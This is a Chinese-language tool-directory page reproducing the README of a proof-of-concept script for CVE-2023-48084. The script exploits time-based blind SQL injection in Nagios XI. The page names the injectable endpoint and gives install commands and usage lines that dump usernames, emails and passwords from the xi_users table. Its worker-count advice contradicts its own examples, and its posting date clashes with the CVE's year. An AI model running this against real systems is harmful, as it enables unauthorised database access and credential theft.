Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-48084-Revised — Python PoC,利用 Nagios XI 中基于时间的盲 SQLi 提取数据库内容,支持多线程二分搜索提取以及 CLI schema/表/列选择。 | Kitploit
工具/GitHubGitHub/metthk/cve-2023-48084-revised
漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试数据库安全
GitHubmetthk/cve-2023-48084-revised

CVE-2023-48084-Revised

Python PoC,利用 Nagios XI 中基于时间的盲 SQLi 提取数据库内容,支持多线程二分搜索提取以及 CLI schema/表/列选择。

查看仓库
61个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-48084 — 更新版 PoC

仓库: MettHK/CVE-2023-48084-Revised

这是 Hamibubu/CVE-2023-48084 的更新版本, 增加了多线程、二分查找提取,以及用于选择数据库 / 表 / 列的 CLI 参数。

并非原始仓库。 这是一个衍生/改进版 PoC。原始工作的功劳归于 Hamibubu。

免责声明

仅限授权的安全测试和教育用途。不要将其用于你不拥有或未经明确授权测试的系统。作者和贡献者不对滥用行为负责。

关于该漏洞

CVE-2023-48084:Nagios XI 5.11.3 之前的版本在批量修改工具中存在 SQL 注入漏洞。

此 PoC 利用了以下位置上的基于时间的盲 SQL 注入:

root@kitploit:~
/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SQL)

你需要一个有效的非管理员会话 Cookie(nagiosxi)或一个 API 令牌。

相对原版的改动

区域改动内容
提取对字符串长度和 ASCII 字符进行二分查找(大幅减少请求数)
性能多线程字符提取(-w / --workers)
CLI-d / --database — 跳过 schema 发现
CLI-t / --table — 跳过表发现(需要 -d)
CLI-C / --columns — 逗号分隔的列,跳过列发现(需要 -t)
时序可配置的 --delay、--threshold、--max-length
稳健性每线程独立 HTTP 会话;可选 pwntools(进度条)并提供纯文本回退
文档注明原版来源/链接;示例中不含实验主机名或 CTF 遗留内容

环境要求

  • Python 3.8+
  • requests(必需)
  • pwntools(可选;更美观的进度输出)
root@kitploit:~
git clone https://github.com/MettHK/CVE-2023-48084-Revised.git
cd CVE-2023-48084-Revised
pip install -r requirements.txt

使用方法

root@kitploit:~
# 交互式(发现 schema → 表 → 列)
python3 CVE-2023-48084.py -u https://target.example/nagiosxi -c '<cookie>'
python3 CVE-2023-48084.py -u https://target.example/nagiosxi -a '<api_token>'

# 快速路径:已知数据库 + 表 + 列
python3 CVE-2023-48084.py \
  -u https://target.example/nagiosxi \
  -c '<cookie>' \
  -d nagiosxi \
  -t xi_users \
  -C username,email,password \
  -w 15 \
  --delay 1.2

我不建议使用超过 2 个 worker,因为它可能会返回不正确的结果

选项

参数说明
-u / --url基础 URL(例如 https://target.example/nagiosxi)
-c / --cookienagiosxi 会话 Cookie 的值
-a / --apiKeyAPI 令牌(不要与 -c 同时使用)
-d / --databaseSchema/数据库名称(跳过 schema 枚举)
-t / --table表名称(跳过表枚举;需要 -d)
-C / --columns逗号分隔的列(跳过列枚举;需要 -t)
-w / --workers并行线程数(默认:10)
--delay真分支上的 SLEEP 秒数(默认:1.5)
--threshold视为命中所需的最短响应时间(默认:delay * 0.8)
--max-length长度二分查找的上界(默认:2048)

提示

  • 字符错误 / 结果噪声大 → 增大 --delay(例如 2)或降低 -w(例如 5)。
  • 目标稳定且快速 → 可尝试更多 worker(-w 15–20)。
  • 如果已知目标 schema,优先使用 -d / -t / -C,以避免耗时的发现过程。
下载工具